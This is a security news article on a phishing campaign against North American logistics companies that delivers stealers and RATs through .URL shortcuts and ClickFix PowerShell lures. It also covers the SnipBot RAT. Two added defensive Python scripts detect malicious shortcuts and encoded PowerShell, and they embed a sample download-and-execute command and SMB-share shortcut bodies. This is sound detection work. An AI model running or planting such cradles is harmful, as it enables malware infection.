Transportation and logistics companies in North America are the target of a new phishing campaign that delivers a variety of information stealers and remote access trojans (RATs).
The activity cluster, per Proofpoint, makes use of compromised legitimate email accounts belonging to transportation and shipping companies so as to inject malicious content into existing email conversations.
As many as 15 breached email accounts have been identified as being used in the campaign. It's currently not clear how these accounts were compromised in the first place or who is behind the attacks.
"Activity which occurred from May to July 2024 predominately delivered Lumma Stealer, StealC, or NetSupport," the enterprise security firm said in an analysis published Tuesday.
"In August 2024, the threat actor changed tactics by employing new infrastructure and a new delivery technique, as well as adding payloads to deliver DanaBot and Arechclient2."
The attack chains involve sending messages bearing internet shortcut (.URL) attachments, or Google Drive URLs leading to a .URL file, that, when launched, use Server Message Block (SMB) to fetch the next-stage payload containing the malware from a remote share.
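A mail gateway or triage script can check an attached .URL file for exactly this pattern: an Internet Shortcut whose target resolves to a remote SMB/UNC share rather than a web address. The Python below is an added example written for this article, not Proofpoint's or the campaign's code; the three shortcut bodies and the IP addresses in them are constructed samples. It generalizes slightly beyond the article by also checking the IconFile and WorkingDirectory fields of the shortcut format, since those can name a remote path as well.

```python
import configparser
from urllib.parse import urlparse

# Constructed sample .URL attachments for illustration (not files from the campaign).
BENIGN_SHORTCUT = """[InternetShortcut]
URL=https://www.example.com/customer-portal
"""

SMB_URL_SHORTCUT = """[InternetShortcut]
URL=file://203.0.113.10/share/Rate_Confirmation.pdf.lnk
IconIndex=0
"""

UNC_ICON_SHORTCUT = r"""[InternetShortcut]
URL=https://www.example.com/
IconFile=\\198.51.100.7\icons\doc.ico
IconIndex=1
"""

# Fields of the Internet Shortcut format that can name a remote resource
# (checking IconFile/WorkingDirectory is a generalization beyond the article).
CHECKED_FIELDS = ("url", "iconfile", "workingdirectory")


def is_remote_share(value: str) -> bool:
    """True if the value points at a remote SMB/UNC share rather than a web resource."""
    v = value.strip()
    # Raw UNC path: \\server\share\... (or the forward-slash form).
    if v.startswith("\\\\") or v.startswith("//"):
        return True
    parsed = urlparse(v)
    # file:// with a host component is resolved by Windows as an SMB share;
    # file:///C:/... (no host) is a local path and is not flagged.
    return parsed.scheme.lower() == "file" and bool(parsed.netloc)


def inspect_shortcut(text: str) -> dict:
    """Parse a .URL file body and report which fields point at a remote share."""
    # .URL files are INI-style; disable interpolation so '%' in URLs is kept literal.
    parser = configparser.ConfigParser(interpolation=None, strict=False)
    parser.read_string(text)
    result = {"target": None, "remote_fields": []}
    if not parser.has_section("InternetShortcut"):
        return result
    section = parser["InternetShortcut"]
    result["target"] = section.get("url")  # keys are case-insensitive in configparser
    for name in CHECKED_FIELDS:
        value = section.get(name)
        if value and is_remote_share(value):
            result["remote_fields"].append(name)
    return result


if __name__ == "__main__":
    samples = [("benign", BENIGN_SHORTCUT),
               ("smb-url", SMB_URL_SHORTCUT),
               ("unc-icon", UNC_ICON_SHORTCUT)]
    for label, body in samples:
        print(label, inspect_shortcut(body))
```

A non-empty `remote_fields` list is the signal worth alerting on: a shortcut delivered by email has little legitimate reason to reach out to an SMB share on the internet, and the same check can be applied to .URL files extracted from Google Drive links before they reach a user.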
Some variants of the campaign observed in August 2024 have also latched onto a recently popular technique called ClickFix to trick victims into downloading the DanaBot malware under the pretext of addressing an issue with displaying document content in the web browser.
Specifically, this involves urging users to copy and paste a Base64-encoded PowerShell script into the terminal, thereby triggering the infection process.
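Because the ClickFix step ends with the user running a Base64-encoded PowerShell command from explorer, it leaves a clear trace in process-creation telemetry. The Python below is an added example written for this article, not code from Proofpoint or the campaign: it scans constructed process-creation log lines for a PowerShell launch with an encoded-command flag, decodes the UTF-16LE payload, and lists the download-and-execute indicators found in it. The log lines, the IP address and the encoded script are constructed samples.

```python
import base64
import re
from dataclasses import dataclass
from typing import List, Optional

# PowerShell accepts any unambiguous prefix of -EncodedCommand (-e, -ec, -enc, ...),
# so match "-e<letters>" followed by a Base64 run; the length floor and the
# decode step below weed out ordinary flags such as -ExecutionPolicy Bypass.
ENC_FLAG = re.compile(r"(?i)(?:^|\s)-e[a-z]*\s+([A-Za-z0-9+/=]{16,})")

# Substrings that, in a decoded script, suggest a download-and-run cradle.
SUSPICIOUS = ("invoke-expression", "iex", "downloadstring", "invoke-webrequest",
              "iwr", "http://", "https://", "frombase64string")


@dataclass
class Finding:
    line_no: int
    decoded: str
    indicators: List[str]


def decode_encoded_command(b64: str) -> Optional[str]:
    """Decode a -EncodedCommand argument (Base64 of UTF-16LE text), or None if it is not one."""
    try:
        return base64.b64decode(b64, validate=True).decode("utf-16-le")
    except (ValueError, UnicodeDecodeError):
        return None


def scan_process_log(lines) -> List[Finding]:
    """Return one Finding per log line that launches PowerShell with an encoded command."""
    findings = []
    for n, line in enumerate(lines, 1):
        if "powershell" not in line.lower():
            continue
        m = ENC_FLAG.search(line)
        if not m:
            continue
        decoded = decode_encoded_command(m.group(1))
        if decoded is None:
            continue
        low = decoded.lower()
        findings.append(Finding(n, decoded, [k for k in SUSPICIOUS if k in low]))
    return findings


def _enc(script: str) -> str:
    """Encode a script the way -EncodedCommand expects (used only to build the sample)."""
    return base64.b64encode(script.encode("utf-16-le")).decode("ascii")


# Constructed sample process-creation events (Sysmon-style fields, not real telemetry).
SAMPLE_LOG = [
    'EventID=1 Image=C:\\Windows\\System32\\svchost.exe CommandLine="svchost.exe -k netsvcs"',
    'EventID=1 Image=C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe '
    'CommandLine="powershell.exe -ExecutionPolicy Bypass -File C:\\scripts\\backup.ps1"',
    'EventID=1 ParentImage=C:\\Windows\\explorer.exe '
    'Image=C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe '
    'CommandLine="powershell -w hidden -enc '
    + _enc("Invoke-Expression (Invoke-WebRequest 'http://203.0.113.55/fix').Content") + '"',
]


if __name__ == "__main__":
    for f in scan_process_log(SAMPLE_LOG):
        print(f"line {f.line_no}: indicators={f.indicators}\n  decoded: {f.decoded}")
```

In the sample only the third line is reported, and its parent being explorer.exe is the extra context a ClickFix hunt would pivot on: an encoded PowerShell command spawned directly from the shell rather than from a script host or management tool. The indicator list is a heuristic, so treat it as a triage aid rather than a verdict.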
"These campaigns have impersonated Samsara, AMB Logistic, and Astra TMS – software that would only be used in transport and fleet operations management," Proofpoint said.
"The specific targeting and compromises of organizations within transportation and logistics, as well as the use of lures that impersonate software specifically designed for freight operations and fleet management, indicates that the actor likely conducts research into the targeted company's operations before sending campaigns."
The disclosure comes amid the emergence of various stealer malware strains such as Angry Stealer, BLX Stealer (aka XLABB Stealer), Emansrepo Stealer, Gomorrah Stealer, Luxy, Poseidon, PowerShell Keylogger, QWERTY Stealer, Taliban Stealer, X-FILES Stealer, and a CryptBot-related variant dubbed Yet Another Silly Stealer (YASS).
It also follows the emergence of a new version of the RomCom RAT, a successor to PEAPOD (aka RomCom 4.0) codenamed SnipBot that's distributed via bogus links embedded within phishing emails. Some aspects of the campaign were previously highlighted by the Computer Emergency Response Team of Ukraine (CERT-UA) in July 2024.
"SnipBot gives the attacker the ability to execute commands and download additional modules onto a victim's system," Palo Alto Networks Unit 42 researchers Yaron Samuel and Dominik Reichel said.
"The initial payload is always either an executable downloader masked as a PDF file or an actual PDF file sent to the victim in an email that leads to an executable."
The latest version employs an extended set of 27 commands, allowing the operators to enumerate directory paths, run commands using cmd.exe, upload and download files, gather a list of running processes, set up a SOCKS proxy, and use 7-Zip to create an archive of the attacker-provided path.
While systems infected with RomCom have also seen ransomware deployed in the past, the cybersecurity company pointed out that no such behavior was observed this time, raising the possibility that the threat actor behind the malware, Tropical Scorpius (aka Void Rabisu), has shifted from pure financial gain to espionage.